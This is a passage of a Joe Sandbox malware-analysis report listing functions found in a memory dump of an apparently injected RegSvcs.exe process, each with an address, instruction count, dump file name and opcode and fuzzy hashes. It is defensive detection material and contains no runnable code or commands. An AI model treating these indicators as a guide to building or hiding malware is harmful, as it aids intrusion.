                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 573d970044a9f79c3fa253c4ca45cbee549c9c1b5c87c6665f50b4c6f998463a
                                                                                                                                                                                • Instruction ID: 1fa52ea57305112e1cccf182aeb5178a8eacc6d2dbb1abfa85d95387be7ea69a
                                                                                                                                                                                • Opcode Fuzzy Hash: 573d970044a9f79c3fa253c4ca45cbee549c9c1b5c87c6665f50b4c6f998463a
                                                                                                                                                                                • Instruction Fuzzy Hash: 68319E744317568FF2402F20A5AEBAA7FA8FB1F31B744FD50F90B80645DF340085AA51
                                                                                                                                                                                Function 019A6F30 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b4e9cd20daba8aadbd2100e73f7685fb3634d18ad7691aa98ebdcef13425843b
                                                                                                                                                                                • Instruction ID: f2034b3494f29a7d3a90a8977fd385728b73b5d242a505eca26f364fa1a1f901
                                                                                                                                                                                • Opcode Fuzzy Hash: b4e9cd20daba8aadbd2100e73f7685fb3634d18ad7691aa98ebdcef13425843b
                                                                                                                                                                                • Instruction Fuzzy Hash: F22149353402114BDB1A177D8895E393FAEAFC515A7C88479E60ACB356EE27CC0AD3D1
                                                                                                                                                                                Function 019A6F40 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f9adfce731dc75bddd4d0cebe97a0948f68fccc838f3a533d93630f87ea62184
                                                                                                                                                                                • Instruction ID: 12dcd522a4296c8334123747717a335f8784ca42e5ffd6b95b2a7a040cc1783f
                                                                                                                                                                                • Opcode Fuzzy Hash: f9adfce731dc75bddd4d0cebe97a0948f68fccc838f3a533d93630f87ea62184
                                                                                                                                                                                • Instruction Fuzzy Hash: 902148353401114BEB1A0629C495B3E3A9FAFC421AF948439E60ACB795DE7BCC46D3C1
                                                                                                                                                                                Function 019A52BB Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e3ad6d77fb67ed905b0381729bef834db09c1e4782d4a4468fa21401fcf728fa
                                                                                                                                                                                • Instruction ID: 4c18e9400f2b4093bceb6209e61fb0e52ea08d2ccd540c33e34004b189a232e4
                                                                                                                                                                                • Opcode Fuzzy Hash: e3ad6d77fb67ed905b0381729bef834db09c1e4782d4a4468fa21401fcf728fa
                                                                                                                                                                                • Instruction Fuzzy Hash: 3921F235700512CFE7258A29D494A2EB7A6FFC9711B568079E90ECB344CF70CC068BC0
                                                                                                                                                                                Function 019A18C8 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dd9d3e927d562a100a7c2c56da0ee2cbda1bc5ec6a65ed334c45a8aee228178e
                                                                                                                                                                                • Instruction ID: c57e2945db7816581426ad251f2829b57871dc0a385b99b79697d27939b45e02
                                                                                                                                                                                • Opcode Fuzzy Hash: dd9d3e927d562a100a7c2c56da0ee2cbda1bc5ec6a65ed334c45a8aee228178e
                                                                                                                                                                                • Instruction Fuzzy Hash: 93218E35A001069FCB24DF68D8409FF77A9EB89264F548469D91D9B340EB35EA0ECBD2
                                                                                                                                                                                Function 019A0EC8 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f78395c8ef86b804ce79ace221a6daa9115ccdf0086f12da477ec6182afbef89
                                                                                                                                                                                • Instruction ID: af4aef0592cfc98ffb1a742379ddd44dfa071c9cf50e4fb00140f15f8bfed5f4
                                                                                                                                                                                • Opcode Fuzzy Hash: f78395c8ef86b804ce79ace221a6daa9115ccdf0086f12da477ec6182afbef89
                                                                                                                                                                                • Instruction Fuzzy Hash: BF21F870E04209DFDB05EFB9D4406AEBBB6FF84304F54C4A99508AB348DB799949CF81
                                                                                                                                                                                Function 019A324D Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 80bfef35db218648f44a07b1c83aa5f13c191b8bf098ab3c966b42f9051fdb0f
                                                                                                                                                                                • Instruction ID: f86ddaa1c63c09927f9e360414359a959ec27078b1b889909f7d7a997f4b63fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 80bfef35db218648f44a07b1c83aa5f13c191b8bf098ab3c966b42f9051fdb0f
                                                                                                                                                                                • Instruction Fuzzy Hash: 5331C774E11308CFCB14DFA8D5848AEBBB6FF49304B2094A9E909AB364DB35AD05CF41
                                                                                                                                                                                Function 019A9EB0 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 82dfbfd4ea2ceeb6c01ad7e67accf5d9d0efcc4dc754ebc5283ef70551f6ded1
                                                                                                                                                                                • Instruction ID: 65fccf133310a4b02c350612b8fc224322816b021c16ac4ade434ee7d9030f07
                                                                                                                                                                                • Opcode Fuzzy Hash: 82dfbfd4ea2ceeb6c01ad7e67accf5d9d0efcc4dc754ebc5283ef70551f6ded1
                                                                                                                                                                                • Instruction Fuzzy Hash: A1216F36A001049FEB109A58DC89FA9BBB9BB8C715F548025FA1AA7391DA71AC14CB90
                                                                                                                                                                                Function 019A8729 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 675a68c03227bf24b74eab52814abf05fa734b6f9d2af63bc8cf794a031eeeb0
                                                                                                                                                                                • Instruction ID: 92ae17508b409cd2c66e952847074614818039660b66dfd7cd61c80b094c9c9b
                                                                                                                                                                                • Opcode Fuzzy Hash: 675a68c03227bf24b74eab52814abf05fa734b6f9d2af63bc8cf794a031eeeb0
                                                                                                                                                                                • Instruction Fuzzy Hash: 20219F70E002499FDB15CFA5D540AEEBFBAEF48302F248069E455E7290DB35D944DF60
                                                                                                                                                                                Function 019A0ED8 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1842304764630195590501c49575d4ddd0d20e754063ee161c7e75ddc4de8aa9
                                                                                                                                                                                • Instruction ID: cf4595d2ca807a17c88fcc7621d895adb1eb05c0f9772f212e9d1f953b5c1f78
                                                                                                                                                                                • Opcode Fuzzy Hash: 1842304764630195590501c49575d4ddd0d20e754063ee161c7e75ddc4de8aa9
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B218170E04209DFDB08EFB9D4446AEBBBAFF84304F50C4A99409AB348DB799945CF81
                                                                                                                                                                                Function 019A17B8 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3697da3536676f8bed438369af2894b2c5ebdb071db164f66438f15647fac749
                                                                                                                                                                                • Instruction ID: a0b46af9443f2af1283a75189a2e62b2d28cc8f707c67ac6cecfe164adf1097e
                                                                                                                                                                                • Opcode Fuzzy Hash: 3697da3536676f8bed438369af2894b2c5ebdb071db164f66438f15647fac749
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C213470C052098FCB00DFA8D945AEEBFF4FF0A300F04516AD919B7211EB345A84CBA2
                                                                                                                                                                                Function 019ADB08 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 14b1ad6385934bb0cfb9667423c75044d01967b360d04aa32e4c8690c94a008a
                                                                                                                                                                                • Instruction ID: dffee295fcde6e648370e65ddbd85dc2a3a7d858908c15c6173bb01a8c448750
                                                                                                                                                                                • Opcode Fuzzy Hash: 14b1ad6385934bb0cfb9667423c75044d01967b360d04aa32e4c8690c94a008a
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A118F353002048FC714DB6DD998E56B7FAFF88721F508469E209CB761CA71EC08CB50
                                                                                                                                                                                Function 019A52C8 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b14e0c3ff026accb8c85f5884258b9b6d89d83f49666ab7f1f5fb368443db2aa
                                                                                                                                                                                • Instruction ID: dfafa3f2a1dea0f4dc5609b74abc0ca5b58b2355504698df66346a269efa02e4
                                                                                                                                                                                • Opcode Fuzzy Hash: b14e0c3ff026accb8c85f5884258b9b6d89d83f49666ab7f1f5fb368443db2aa
                                                                                                                                                                                • Instruction Fuzzy Hash: 2311E531700612DFE7195A2AD454A2EBBAAFFC56627564078E90BCB350CF70DC0687D0
                                                                                                                                                                                Function 019A17D8 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9aaa8387761316f570af8981a55bd5d8def1f0d649ba5828c6a0a73413abd7da
                                                                                                                                                                                • Instruction ID: 607064f1c12b8fb2a7dec41531ae0e503d5938385f079c80cd6c4c52b7457e5e
                                                                                                                                                                                • Opcode Fuzzy Hash: 9aaa8387761316f570af8981a55bd5d8def1f0d649ba5828c6a0a73413abd7da
                                                                                                                                                                                • Instruction Fuzzy Hash: 29119374D116098FCB40EFA9D9459EEBFF4FF49301F10916AD919B2214EB305A85CFA1
                                                                                                                                                                                Function 019ADEB8 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 62be880d7b8792fc46d8c3ef07056eae5292391341a13ed252080fad763242e6
                                                                                                                                                                                • Instruction ID: 609f1a68d0616d5750ac62bd03c390d017104df5341e86444c28b1594ec28dab
                                                                                                                                                                                • Opcode Fuzzy Hash: 62be880d7b8792fc46d8c3ef07056eae5292391341a13ed252080fad763242e6
                                                                                                                                                                                • Instruction Fuzzy Hash: 54012B367142948FDB071BB8580946E3FA9EBD6221719406BE60DCB282EE35CC06D7D5
                                                                                                                                                                                Function 019A4E70 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 363f10153f96924aa19457b6f185cecd6d95d9d55bae4ccebd6e9b7d09caf2a6
                                                                                                                                                                                • Instruction ID: 295549f514e2270cce8ff6c05aeb0e448269b077a670b4e59cea789826cd38d3
                                                                                                                                                                                • Opcode Fuzzy Hash: 363f10153f96924aa19457b6f185cecd6d95d9d55bae4ccebd6e9b7d09caf2a6
                                                                                                                                                                                • Instruction Fuzzy Hash: 2001D632B041156B9B059E999844BEF7FFBEBC8650F58C029FA0DC7284CEB19C1597D0
                                                                                                                                                                                Function 019A4E5F Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ad4cdf67e158bf30d2b2530ac79cc6de67b49e311ddfcedd74ec796a4fbd158e
                                                                                                                                                                                • Instruction ID: cf67891b0a8ad6d38541bf284f840115ede1d6dba01f2be9f2dcc2765df162de
                                                                                                                                                                                • Opcode Fuzzy Hash: ad4cdf67e158bf30d2b2530ac79cc6de67b49e311ddfcedd74ec796a4fbd158e
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C01F9326041056BEB018E54D845FDF7FBAEB98350F288025FE08C7244DA71D91697D0
                                                                                                                                                                                Function 019AE160 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c41a6bbd6a03b00618c27e73a6c0d6e5d8eb5001739fab3606e2954adeeb502e
                                                                                                                                                                                • Instruction ID: 2a5e8c4735cfb99d6ba5aab5b89e4373c1beba514038a8856663f66facbe2d3a
                                                                                                                                                                                • Opcode Fuzzy Hash: c41a6bbd6a03b00618c27e73a6c0d6e5d8eb5001739fab3606e2954adeeb502e
                                                                                                                                                                                • Instruction Fuzzy Hash: 15F02B36B046209FD71597ADE841AEE7BE9DFC5621B0440AAD40CCB791CE31D80687D0
                                                                                                                                                                                Function 019AD9A3 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8f2c122159809341fba2b83d7aa1033564db85dc105f773b8eeedac87d460e06
                                                                                                                                                                                • Instruction ID: f65251e983b32d2fa93143e05fa125f49b8a27172af630a593d10cba896a25a3
                                                                                                                                                                                • Opcode Fuzzy Hash: 8f2c122159809341fba2b83d7aa1033564db85dc105f773b8eeedac87d460e06
                                                                                                                                                                                • Instruction Fuzzy Hash: 2FF096729042059F8B50DFADD84199FBFF9FB98350B40453AD609E3611E770961987E1
                                                                                                                                                                                Function 019ADE58 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7484479a8a0caff9897f2ae9df6490db617ea5eafcfc36fa3c2c564a9ad61d3e
                                                                                                                                                                                • Instruction ID: dd004e6650804502e5bf01050cecfa7a6e32ab67d23f99af0b43900b2e2cd198
                                                                                                                                                                                • Opcode Fuzzy Hash: 7484479a8a0caff9897f2ae9df6490db617ea5eafcfc36fa3c2c564a9ad61d3e
                                                                                                                                                                                • Instruction Fuzzy Hash: 9AF03A35300105DFC7408F59D488D6ABBEAFF88725B644069EA0987731CB71AC15CB80
                                                                                                                                                                                Function 019AB158 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7ca227fec8038097c7fe95d591c92959bfe2911f0198facaccd1c27bf50e6f5f
                                                                                                                                                                                • Instruction ID: 8ab2bdf10c2f6036bcef3c2116151524d89a8ebab4c1633b06a7fc9509b95fa0
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ca227fec8038097c7fe95d591c92959bfe2911f0198facaccd1c27bf50e6f5f
                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF098310273428FE3262B24B86C26A7F74FB4B313BC46D56E44AC2469DB754645DF11
                                                                                                                                                                                Function 019AD9B0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6df919361e3479085522502b85ccc233cfeea35443945b586043052919a6f986
                                                                                                                                                                                • Instruction ID: 9a98157b374edc52d0aab86ef80525f4183787c7327d02d9afc43655322b26a5
                                                                                                                                                                                • Opcode Fuzzy Hash: 6df919361e3479085522502b85ccc233cfeea35443945b586043052919a6f986
                                                                                                                                                                                • Instruction Fuzzy Hash: 17F08272D042099F8B50DFAED8409AFBBF9FF98350B40453AD609D3214EA709A198BE1
                                                                                                                                                                                Function 019A56FF Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9c4e65452813324a2acdb9d4519f77dae18c534bb447003e309b1f2aee5b981c
                                                                                                                                                                                • Instruction ID: 5de7cc32bf2040ce074bfeb500a0bec72bb553a90a924dfee4843fb398d89509
                                                                                                                                                                                • Opcode Fuzzy Hash: 9c4e65452813324a2acdb9d4519f77dae18c534bb447003e309b1f2aee5b981c
                                                                                                                                                                                • Instruction Fuzzy Hash: 53E05572044208CFD225A7286C40A983F1FEE95100BE14814C00C4B06FEF38884A4AA5
                                                                                                                                                                                Function 019A1877 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a9c7d0ec7022ef34c4382824a086db438af68894216d4b3d27969d5bfeb01f10
                                                                                                                                                                                • Instruction ID: 64a5689105f92bb66cd8de205d210bcf4afd4f2d7426226c93b7c68ec0038bcf
                                                                                                                                                                                • Opcode Fuzzy Hash: a9c7d0ec7022ef34c4382824a086db438af68894216d4b3d27969d5bfeb01f10
                                                                                                                                                                                • Instruction Fuzzy Hash: D8E09231D112575EC71A9BA49C144EDBB34AFD6290B854273D5187B150FB30194E87E2
                                                                                                                                                                                Function 019A9F6D Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19e977d969925d1fb3b847e6672132ee16c84289173f5b1df391a9c9b3b08a41
                                                                                                                                                                                • Instruction ID: 0ad87c23fd4de2bc3c1ce25ec0bdbff500679ce688e29f71c9e7e339d2c843c4
                                                                                                                                                                                • Opcode Fuzzy Hash: 19e977d969925d1fb3b847e6672132ee16c84289173f5b1df391a9c9b3b08a41
                                                                                                                                                                                • Instruction Fuzzy Hash: 35D0673AB400189FCB049F98E880DDDFB76FB98321B448116FD15A3261CA319925DB50
                                                                                                                                                                                Function 019A5710 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 93724112599f6706010de43ac9795b4100b8bc6ee9fe2ab82850d91730928a80
                                                                                                                                                                                • Instruction ID: d9afe6a6efbd33902e24911cb515e3f2677d0d4d17157a8691a3b34f09fdd0a2
                                                                                                                                                                                • Opcode Fuzzy Hash: 93724112599f6706010de43ac9795b4100b8bc6ee9fe2ab82850d91730928a80
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BC0123044430A4FC549EB65FE86E65772EEE90304B609524A00A0655EEFBD5C498A90

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 019AF1E9 Relevance: .3, Instructions: 273COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ca79877d5fae97cb43934dc5d7d514872cda90bd5afd63257fe8844bec097249
